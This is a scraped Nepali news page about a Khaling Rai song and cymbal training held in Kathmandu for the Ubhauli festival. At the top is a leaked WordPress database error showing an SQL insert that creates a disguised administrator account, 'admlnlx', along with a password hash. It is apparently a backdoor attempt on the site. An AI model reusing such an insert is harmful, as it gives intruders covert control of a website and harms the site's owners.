WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2IZQCQ7XPLCxl7ALzvRhQY59I1u/k0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-28 15:54:22', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । उभौली पर्व वास को अवसरमा एक हप्त्ते खालिङ वास शिली तथा म्यान्युव्य (झ्याम्टा) प्रशिक्षण सुरु भएको छ ।
किरात खालिङ राई आमा समूहको आयोजनमा आईतबार १७ गते बाट काठमाडौ सुकेधारा स्थित नवदुर्ग पार्टि भेनुमा उक्त तालिम शुरु भएको हो ।
किरात खालिङ राई उत्थान संघ केन्द्रीय कार्यसमी र जिल्ला कार्यसमिती काठमाण्डौको ब्यबस्थापन सहयोगमा सन्चालन भएको वास शिली तथा म्यन्युव्य प्रशिक्षणमा निरा खालिङ “मकमफुल” (८२) बर्ष, दोर्जिमाया खालिङ “सिमन” (८०) बर्ष, कुमार खालिङ “सिमलाल” र म्यान्युव्यतर्फ सागबहादुर खालिङ “राम्रीसे”, आङ्द्वावा खालिङ “सिरिसे”ले प्रशिक्षण गर्नुहुने छ ।
कार्यक्रमको उदघाटन खालिङ बिधिबाट किरात खालिङ राई पुर्खा संयोजक पुर्णबहादुर खालिङ “जिरिसे”, सदस्य संखर खालिङ “रिजम्बर” लगायत उपस्तिथ पुर्खा र अग्रजहरुले मुन्धुम अनुसार गरे ।
कार्यक्रममा सोलुखुम्बु, खोटाङ, सङ्खुवासभा, भोजपुर, धनकुटा, मोरङ, सुनसरी, उदयपुर, चितवन र उपत्यकाबाट बाक्लो प्रशिक्षार्थीको उपस्तिथी रहेको छ ।
उदघाटन कार्यक्रममा किरात खालिङ राई उत्थान संघका सल्लाहकार राजकुमार खालिङ “मरिसलाल”, मानबिर खालिङ “इछमला”, धनकुमार खालिङ, किरात खालिङ राई उत्थान संघ केन्द्रीय कार्यसमितिका पदाधिकारी, जिल्ला कार्यसमिती काठमाण्डौका पदाधिकारी, वास समितिका पदाधिकारी, किरात खालिङ राई उत्थान संघका भातृ सङ्गठनका पदाधिकारीहरुको बाक्लो उपस्तिथी रहेको थियो ।